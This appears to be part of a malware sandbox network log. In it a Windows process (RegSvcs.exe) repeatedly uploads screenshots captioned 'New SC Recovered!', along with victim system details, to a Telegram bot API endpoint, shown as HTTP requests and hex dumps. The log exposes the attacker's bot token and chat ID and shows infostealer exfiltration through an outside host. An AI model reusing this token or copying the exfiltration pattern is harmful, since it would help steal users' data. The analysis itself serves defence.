2024-12-06 04:52:28 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:52:28 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:52:28 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:52:28 UTC	1364	OUT	Data Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07 Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
2024-12-06 04:52:28 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 30 64 64 37 34 39 33 36 61 61 62 2d 2d 0d 0a Data Ascii: -----------------------------8dd20dd74936aab--
2024-12-06 04:52:28 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:52:29 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:52:29 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170394,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460749,"document":{"file_name":"user-610930 2024-12-20 10-02-47.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZmmdSgw0amSAp_YYSFDA5u6H2kV9KAALoFAACOh6ZUvzQ81Q8-pdHAQAHbQADNgQ","file_unique_id":"AQAD6BQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZmmdSgw0amSAp_YYSFDA5u6H2kV9KAALoFAACOh6ZUvzQ81Q8-pdHAQAHbQADNgQ","file_unique_id":"AQAD6BQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmZpnUoMNGpkgKf2GEhQwObuh9pFfSgAC6BQAAjoemVL80PNUPPqXRzYE","file_unique_id":"AgAD6BQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 12/20/2024 10:02:42\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49849	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:52:40 UTC	238	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd26c0b81f4a09 Host: api.telegram.org Content-Length: 66950 Expect: 100-continue
2024-12-06 04:52:40 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 32 37 2f 32 30 32 34 20 32 31 3a 35 32 3a 31 31 0a 55 73 65 72 Data Ascii: -----------------------------8dd26c0b81f4a09Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd26c0b81f4a09Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/27/2024 21:52:11User
2024-12-06 04:52:40 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:52:40 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:52:40 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:52:40 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:52:40 UTC	1364	OUT	Data Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07 Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
2024-12-06 04:52:40 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 63 30 62 38 31 66 34 61 30 39 2d 2d 0d 0a Data Ascii: -----------------------------8dd26c0b81f4a09--
2024-12-06 04:52:41 UTC	25	IN	HTTP/1.1 100 Continue
2024-12-06 04:52:41 UTC	1510	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 06 Dec 2024 04:52:41 GMT Content-Type: application/json Content-Length: 1121 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":170400,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1733460761,"document":{"file_name":"user-610930 2024-12-27 21-52-12.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQKZoGdSgxkfgsIXl2IIHGvfgfczcp-jAALuFAACOh6ZUkkeKNUUJNJwAQAHbQADNgQ","file_unique_id":"AQAD7hQAAjoemVJy","file_size":12291,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQKZoGdSgxkfgsIXl2IIHGvfgfczcp-jAALuFAACOh6ZUkkeKNUUJNJwAQAHbQADNgQ","file_unique_id":"AQAD7hQAAjoemVJy","file_size":12291,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECmaBnUoMZH4LCF5diCBxr34H3M3KfowAC7hQAAjoemVJJHijVFCTScDYE","file_unique_id":"AgAD7hQAAjoemVI","file_size":66329},"caption":"New SC Recovered!\n\nTime: 12/27/2024 21:52:11\nUser Name: user/610930\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 819 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49861	149.154.167.220	443	2476	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-06 04:52:46 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd2db458e448f1 Host: api.telegram.org Content-Length: 66950 Expect: 100-continue Connection: Keep-Alive
2024-12-06 04:52:46 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 31 2f 30 35 2f 32 30 32 35 20 31 38 3a 31 31 3a 31 33 0a 55 73 65 72 Data Ascii: -----------------------------8dd2db458e448f1Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd2db458e448f1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 01/05/2025 18:11:13User
2024-12-06 04:52:46 UTC	16355	OUT	Data Raw: 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 54 b3 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"\|T
2024-12-06 04:52:46 UTC	16355	OUT	Data Raw: 00 a2 8a 28 00 a4 a5 a2 98 c2 92 96 92 80 0a 28 a2 80 0a 4a 5a 29 8c 4a 28 c5 14 00 51 45 14 00 51 93 45 14 ee 02 ee 3d f9 a3 08 7a 8c 7d 29 28 a0 00 c7 fd d2 0d 30 a3 0e a0 d3 e9 43 11 de 8b 0e e4 54 54 b9 53 d5 45 21 45 3d 1b f3 a4 35 22 2a 29 e6 36 1d b3 f4 a6 50 3b 89 9a 29 68 a0 62 51 45 14 00 62 92 96 8a 06 36 8a 5a 28 18 94 52 d2 50 02 1a 29 68 a0 04 a4 a5 a2 98 c4 a2 96 90 d2 01 28 f7 a5 a4 a0 62 51 4b 45 31 8d a4 a7 51 40 0d a3 f0 a5 c5 26 3d e9 0c 4a 4a 76 38 a4 a0 62 51 4b 8a 4c 50 3b 89 8a 4f c3 34 ea 4e b4 00 94 9f 4a 76 3b 52 74 a4 31 29 29 d4 94 0c 4a 28 a5 a0 04 a3 ad 14 53 01 28 a5 a4 fa 73 40 c2 8a 3b fb 51 40 09 48 7f 1a 75 27 e1 40 09 45 2e 28 a0 62 51 cd 14 50 30 a4 e3 d6 96 92 80 0a 4f c2 97 a5 14 00 94 51 ef 8a 28 18 52 7d 69 68 a0 Data Ascii: ((JZ)J(QEQE=z})(0CTTSE!E=5"*)6P;)hbQEb6Z(RP)h(bQKE1Q@&=JJv8bQKLP;O4NJv;Rt1))J(S(s@;Q@Hu'@E.(bQP0OQ(R}ih
2024-12-06 04:52:46 UTC	16355	OUT	Data Raw: 7c 77 27 68 c0 1e f5 6e ca f2 1b eb 34 ba 85 b2 8e 33 cf 6f 50 6b ce 35 2d 52 5b e8 2d 6d f9 58 6d e2 54 0b ea 40 00 9a 7e 93 a8 b5 b4 73 d9 c9 21 5b 6b 95 2a c4 1f b8 71 c3 7f 8f b5 61 2c 13 71 72 eb fa 1e 94 71 a9 49 47 a5 bf 13 d0 2f 4e 6e b4 e2 3f e7 b9 ff 00 d1 52 57 2d e2 2f f9 0d 4f f4 5f fd 04 54 9e 1e d4 e4 9a 7b 2d 36 e3 26 5b 79 9b 69 ff 00 64 46 e3 1f 86 6a 3f 11 7f c8 6a 7f f8 0f fe 82 29 50 a6 e9 d6 51 7d 8c f1 95 15 4c 33 92 ee 8c ca 28 a2 bd 43 c0 0a 28 a2 80 0a 28 a2 81 85 14 51 40 05 14 51 40 09 45 2d 14 00 94 52 d1 40 09 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 01 45 14 50 02 51 4b 45 03 12 8a 28 a6 02 51 4b 49 40 05 14 51 40 c4 a2 96 8a 00 4a 29 69 28 00 a2 8a 28 00 a2 8a 28 18 52 52 d2 50 01 49 4e ed 49 40 09 45 2d 25 03 0a 4a 5a Data Ascii: \|w'hn43oPk5-R[-mXmT@~s![k*qa,qrqIG/Nn?RW-/O_T{-6&[yidFj?j)PQ}L3(C((Q@Q@E-R@EPEPEPEPEPQKE(QKI@Q@J)i(((RRPINI@E-%JZ
2024-12-06 04:52:46 UTC	15447	OUT	Data Raw: 00 28 a2 8a 00 4a 28 a2 81 85 25 2d 25 00 14 51 45 03 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 48 69 7b 52 50 01 45 14 50 02 51 45 14 0c 29 29 69 28 00 a2 8a 28 01 28 a5 a4 a0 61 45 14 50 01 49 45 14 c6 14 51 45 00 25 14 66 93 34 0c 5a 4a 4a 28 0b 06 7d a9 33 45 14 0c 29 29 69 28 00 a4 a5 a4 a0 61 45 14 50 30 a4 a2 8a 00 29 29 69 28 18 51 45 14 00 94 51 45 03 10 d1 45 14 00 52 52 d2 50 30 a4 a5 a4 a0 02 92 96 8a 0a 12 8a 29 28 04 2d 25 14 50 02 1a 28 a2 81 85 25 2d 25 03 0a 4a 28 a0 04 a2 96 92 81 85 25 2d 25 03 0a 4a 28 a0 02 92 96 8a 06 25 14 51 40 c2 92 8a 4a 00 5a 4a 28 a0 61 c5 14 94 50 01 45 14 50 31 28 a2 8a 06 25 14 51 40 05 14 52 53 18 7f 3a 28 fc a8 34 86 21 e3 9a 28 a2 98 09 f8 d1 c5 14 50 30 a4 e2 96 93 8a 40 1e f4 7d 28 a2 98 09 4b ed 49 4b 40 Data Ascii: (J(%-%QE(((aHi{RPEPQE))i(((aEPIEQE%f4ZJJ(}3E))i(aEP0))i(QEQEERRP0)(-%P(%-%J(%-%J(%Q@JZJ(aPEP1(%Q@RS:(4!(P0@}(KIK@
2024-12-06 04:52:46 UTC	1364	OUT	Data Raw: 60 b8 51 45 14 c0 28 a2 8a 00 d7 b9 f1 3e b9 71 75 2c ff 00 da b7 91 79 8e 5f cb 8a e1 d5 17 27 38 51 9e 00 ed 51 cb ae 5f 4f 3c 33 dc 49 e7 cd 15 b4 96 de 64 a5 99 99 5c 38 24 92 79 20 48 71 f4 15 99 45 20 b8 51 45 14 00 51 45 14 c0 eb a6 f1 8c 57 31 c4 92 da 3c 7e 5a e0 15 60 d9 fe 58 e9 52 4d e3 68 67 8b ca 6d 34 c4 0f 57 59 03 1f cb 03 f9 d7 1b 45 64 a9 41 28 24 be 1d 56 fd ee 37 26 dc 9f f3 6e 74 5a c7 89 57 51 d2 17 4e 4b 66 55 57 0d e6 33 72 71 9e d8 f7 f5 ae 76 8a 2a a3 15 1b db ab b8 36 dd 93 e8 14 51 45 50 8d ed 2b 56 41 12 c1 3b 6c 65 e1 5b d4 57 5d a6 ea 77 77 0d b5 ef 00 81 06 5e 43 b4 1c 7a 6e eb fa d7 99 d1 5c f5 28 b9 26 a1 2b 5c ce 34 d4 67 cd d3 b1 db f8 ab c4 f0 3d ab d8 58 48 24 32 0c 49 22 f4 03 d0 7a d7 11 45 14 61 f0 f0 c3 c3 92 07 Data Ascii: `QE(>qu,y_'8QQ_O<3Id\8$y HqE QEQEW1<~Z`XRMhgm4WYEdA($V7&ntZWQNKfUW3rqv*6QEP+VA;le[W]ww^Czn\(&+\4g=XH$2I"zEa
2024-12-06 04:52:46 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 64 62 34 35 38 65 34 34 38 66 31 2d 2d 0d 0a Data Ascii: -----------------------------8dd2db458e448f1--
